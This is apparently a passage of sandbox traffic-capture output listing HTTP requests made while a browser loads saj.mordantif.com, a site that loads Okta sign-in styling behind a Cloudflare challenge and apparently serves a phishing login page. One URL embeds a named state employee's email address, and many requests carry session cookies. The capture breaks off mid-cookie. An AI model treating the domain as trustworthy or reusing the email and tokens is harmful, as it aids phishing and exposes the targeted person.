            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8c285aefbf971821/1726232795430/35d15596e15914e0c91615707e683afd29cca0ae83719ab89b59c4812845ce0c/F9IyQelDIMunbIF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcq HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjU3RmNrblo0d0ZDQ21WSENZaWhoVFE9PSIsInZhbHVlIjoiVEJKOHNnZUVQRFcvN3FBTWw4RjRwK2tIZWo0Z20zcjFPTEhqMnhlL2xxTXBBVWxmbnRnZW84eTQ0Y0hXZDRjYVpENUJObnRJUGlhdElvR0Y3RGlFcm1Xdm4zNmpvbHp3WjNvZFpKcUM3TCtGRE00cmhOdTdGMnBTUWptaDRHWVMiLCJtYWMiOiJjNDdiNGNmZWJiMzUyODY0MmVhYjQ4ZTE0ZTQ4NjRmMzJlYTU0MWY4YWE1ZDIxODljZjJjMzk4OTliNTEwYWNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZtZk5RUU56OXg2Z0l6Q3JZZk56Tmc9PSIsInZhbHVlIjoiVXN3djJGemw4MlRvVWgwbVJqOHo1NDdHSzQ0WWptNzIwOVNBVDh1L1dJY0NLOUdyTHZEVVNaTkliY1k4ZE9mSWs1dFdRRmduYWJUdWZvRTZrQ0plS1B3THhqbVJpQXFlcFkxUk56NGRBTndUSDg1M0VnZ2dyaEQyOW84a2ZVbEwiLCJtYWMiOiIzMjRmMTRiY2FhODcyMTFhOTg4NDY2YTc0OTczY2RkMzMzZjQ0YmMxMjdmYzFhM2QzYzNhNjU2Y2Y2ZWI5ZTk3IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /q8Yr/ HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://saj.mordantif.com/q8Yr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjU3RmNrblo0d0ZDQ21WSENZaWhoVFE9PSIsInZhbHVlIjoiVEJKOHNnZUVQRFcvN3FBTWw4RjRwK2tIZWo0Z20zcjFPTEhqMnhlL2xxTXBBVWxmbnRnZW84eTQ0Y0hXZDRjYVpENUJObnRJUGlhdElvR0Y3RGlFcm1Xdm4zNmpvbHp3WjNvZFpKcUM3TCtGRE00cmhOdTdGMnBTUWptaDRHWVMiLCJtYWMiOiJjNDdiNGNmZWJiMzUyODY0MmVhYjQ4ZTE0ZTQ4NjRmMzJlYTU0MWY4YWE1ZDIxODljZjJjMzk4OTliNTEwYWNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZtZk5RUU56OXg2Z0l6Q3JZZk56Tmc9PSIsInZhbHVlIjoiVXN3djJGemw4MlRvVWgwbVJqOHo1NDdHSzQ0WWptNzIwOVNBVDh1L1dJY0NLOUdyTHZEVVNaTkliY1k4ZE9mSWs1dFdRRmduYWJUdWZvRTZrQ0plS1B3THhqbVJpQXFlcFkxUk56NGRBTndUSDg1M0VnZ2dyaEQyOW84a2ZVbEwiLCJtYWMiOiIzMjRmMTRiY2FhODcyMTFhOTg4NDY2YTc0OTczY2RkMzMzZjQ0YmMxMjdmYzFhM2QzYzNhNjU2Y2Y2ZWI5ZTk3IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /q8Yr/?ILhans.anderson@ag.state.mn.us HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://saj.mordantif.com/q8Yr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhqWnVhS0Q2VzBZcnQ1L2drWFo5amc9PSIsInZhbHVlIjoiNG9idFN2YlZTeGREcXp5anFNMFhHRnkrcmRDSTlBSTBxdVByTUlhMXZ2bVlSdzkyK1FVWXdTbDR5Sk1VeEV5QVluVWF0R2lRZkFIRW9za1cvS3VkVjQ5ZEpLc3hOSCtsaDdwZWNaNWlwb1hWeXpTU1RXdGRGeVF0V0xsYU1ZZnciLCJtYWMiOiI2YjM4NTNjODdiOTlkYzRmNmVkNTNkYzQ0NmUxZjUyYTQ1NzJhM2I5ZTM4M2E3YTk2NmY4OGZjNzU0YzYzNWQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImE3bGcreVZwY2NvQTNOa3E4N2xDNEE9PSIsInZhbHVlIjoieVRuZjhUdktlbWlrTlRYck5MNXZUQWdINmltRThwOGdubGFjcnRBZjdXazM5emRuZXNtd0pWUjZ3OUREMVFFS0FnUm40OXEycWlJVnBBS0pyb29pUis4OU9rdzJaVkpvVUlvc2MxMXVyT05EUTFTclFOeTI5N3MzWGs4ck5VaG8iLCJtYWMiOiIyYzAwYjk3MTFkNzc1ZmI2ZmEyZDRjZThmN2MxYTYyMTQyMTcxNWRkYThjYzQ4MWY2NWMyYzAxZDcxMzhlNTM2IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://saj.mordantif.com/q8Yr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhuVFNLVUltNGtHdEFWSU5nRkRCZ2c9PSIsInZhbHVlIjoiUFg1VmhVSmdhUXozNnNtWGZiUXlXSnhTRVBDNU4xSW8wSFlWQ2paeHRrSGlWekl0L3dhR1BzL1N5OXFBYlNxcEpNNm1FVm9IMUJCK1pJNVFwaWQxeUxLMm1LTXZpdDB3eFNMalZSNG1ndmJNQU1nSWcxV2tqallZaEpIM3h6MEoiLCJtYWMiOiI5MDI0MGFlNmQzZTQ3YTU3MzY3NGI2MTJmYmM1YzliOTkyMmI1ODIzY2YxYWQ3YjUxNTUyNzRkOWE4NWE4NjlmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkFmcFhCQ0c1S09kYmF0cWtSWG5NWHc9PSIsInZhbHVlIjoiVTU3R1lEazZ5cHA2MU9tb0pXb2t2SlJmamxqREt0Ti9MN2J1bEdkcnBaS2QxM2FzcWpRZFhVZThDam9VWlYzTHZKWW1rNUlhbzF5VkNrY3JzWEQzaWtDUXMxUlV6Sm50QlJFV1VPMWJyZXlaSTI4TndocWxoQ0IzcHc3dEFTK2wiLCJtYWMiOiI0ZmZkMDJmYTAwMmM1MTQ2OGUzOGFlYzNkZTM4YjFhZTZkMTEwYmY0NjRlOTE1ZWNiZjU5MjRhNWQ1NWE5NDkwIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
            Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /34PjDiabG2bEMu6719 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /abPT4sUgOrsEgh28 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /pq4G6HI3Ijg6dT2j1yzOjuv38 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /12KYWgiq1CIPJtcA56dot1AeMqr50 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; 